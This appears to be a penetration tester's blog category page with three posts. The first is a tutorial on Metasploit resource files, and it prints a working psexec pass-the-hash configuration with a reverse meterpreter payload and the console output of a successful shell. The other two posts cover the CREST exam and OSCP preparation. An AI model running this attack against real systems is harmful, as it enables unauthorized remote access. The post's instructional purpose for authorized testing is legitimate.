Entries in penetration testing (3)

Monday
Mar212011

Metasploit resource files

DateMar 21, 2011

Metasploit has a handy feature that allows you to load settings from a file, this allows us to create easily repeatable configurations. I like to crate a directory structure when pen testing keeping notes and tool output in plain text files and find it useful to create and store the metasploit config files along with these.

The directory structure would look something like this:

Within the 230_psexec.rc file I would enter the commands I would issue in metasploit to recreate the exploit used against a specific vulnerability (in this case, reuse of passwords across various targets).

The contents of 230_psexec.rc looks like this:

use exploit windows/smb/psexec
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 192.168.1.182
set RHOST 192.168.1.230
set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
set SMBUser Administrator
exploit

 

We can either start metasploit and run these commands right away using the command:

msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

or use the command ‘resource’ within msfconsole like this:

msf> resource /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

 

Our output would look like this:

root@bt:~# msfconsole -r /root/2011-03-21_acme/192.168/1/230/230_psexec.rc

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|


       =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 653 exploits - 343 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11970 updated 5 days ago (2011.03.15)

resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> use windows/smb/psexec
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> setg LHOST 192.168.1.182
LHOST => 192.168.1.182
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set RHOST 192.168.1.230
RHOST => 192.168.1.230
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBPass aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
SMBPass => aad3b435b51404eeaad3b435b51404ee:49e02f1338d4b2bf743beeb97aee524d
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> set SMBUser Administrator
SMBUser => Administrator
resource (/root/2011-03-21_acme/192.168/1/230/230_psexec.rc)> exploit
[*] Started reverse handler on 192.168.1.182:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.1.230:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TwLkuthH.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.230[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (dcZDWuwa - "MluCkfMYLQRNHpqECJiJY")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (749056 bytes) to 192.168.1.230
[*] Closing service handle...
[*] Deleting \TwLkuthH.exe...
[*] Meterpreter session 1 opened (192.168.1.182:4444 -> 192.168.1.230:49305) at Sun Mar 20 23:45:20 +0000 2011

meterpreter >
You can also now add ruby scripts in to the .rc files, I am yet to play around with these but can imagine some very useful scripts, I will write more once I have tried them out.
AuthorSam Hartley | Comment3 Comments | Reference1 Reference |
tagged , in
Thursday
Nov112010

CREST Registered Tester

DateNov 11, 2010

Since my last update I have not been sitting round idling, I have been offered a new position on a penetration testing team which starts in January and I have set my sights on doing the CREST Registered Tester exam early in 2011. More information including the CREST Technical Syllabus can be found at crest-approved.org.

The CREST exams look interesting with a mix of practical assessment, multiple choice and long form written exam questions. The syllabus looks to be well rounded covering a range of topics from both infrastructure and application testing. The NBSIE have posted some material with suggestions on how to prepare for the exam here.

Interestingly the NBISE (national board of information security examiners) in the US have teamed up with CREST and are piloting the exams in the US. Paul Roberts wrote an article over at threatpost “New Certification Will Set High Bar for IT Security Pros” which is worth a read.

Personally I think a lot more value is gained from a certification that actually tests your hands on skills rather than your ability to retain enough information long enough to pass a written exam.

AuthorSam Hartley | Comment1 Comment |
tagged , , in
Wednesday
Aug042010

Recommended Preparation - PWB - OSCP

DateAug 4, 2010

When I was doing research prior to starting the PWB v3 course I spent some time trying to find out what I should know before the course starts. This is just me, I try to prepare for everything I do in advance, read articles and reviews, buy books and learn as much as I can. I was very pleased to find the course is really well taught and I have not had a problem with any of it so far, although it has certainly been a challenge.

Firstly the course does not assume too much, and you can learn everything you need to know as you go along. If you are like me though you will be itching to get started and learn something.

Course syllabus, have a look at the course syllabus and make sure you are at least familiar with the concepts of the material you are going to be learning about. Google is your friend here, I would reccomend learning a little about the tools you will be using. The syllabus and objectives can be found here.

Linux, unless you are familiar with Linux and the command line I would recommend doing some preparation, this is not mandatory as you will learn during the course but it save you time in the long run, linuxcommand.org will help get you up to speed.

Get familiar with BackTrack Linux, sounds like a no-brainer but there is a whole lot of tools included with this operating system, many of them you will be using during the course so knowing your way around the OS will help.

Programming, this is the part that had me worried. I have very little programming experience and thought that I would be really held back by this but during hte course I have written small programs in Python, Perl and edited exploits in Ruby and C, understanding how a program works will help, but knowing how to program is not essential. If you are planning to learn programming in python check out “Think Python - How to Think Like  Computer Scientist” by Allen B. Downey.

If it will be a while before you start the Pentesting with Backtrack course you may want to check out the free Metasploit Unleashed course from Offensive Security, if you can, please also consider donating some money to hackers for charity, more information on the front page of the course.


That’s all for today, hope you found this helpful. If you have some good resources to add please comment below.

 

AuthorSam Hartley | CommentPost a Comment |
tagged , , in